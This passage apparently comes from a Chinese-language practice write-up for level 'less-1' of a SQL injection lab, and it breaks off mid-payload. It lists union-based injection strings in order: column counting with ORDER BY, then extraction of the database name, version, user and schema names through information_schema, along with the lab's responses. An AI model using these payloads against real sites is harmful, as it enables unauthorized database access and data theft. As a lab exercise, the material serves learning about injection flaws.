👩💻 Join our community of thousands of amazing developers!
less-1 ?id=1' --+ ?id=1' order by 3 --+ 1,2,3,4.从4开始报错,列数为3列 ?id=-1' union select 1,2,3 --+ 爆出位置为2,3 ?id=-1' union select 1,database(),3 --+ ?id=-1' union select 1,version(),3 --+ ?id=-1' union select 1,user(),3 --+ 数据库为security版本为5.1.60-community、用户为root@localhost ?id=-1' union select 1,(select schema_name from information_schema.schemata),3 --+ 提示:Subquery returns more than 1 row 子查询超过1行,可以使用limit来限制长度 ?id=-1' union select 1,(select schema_name from information_schema.schemata)...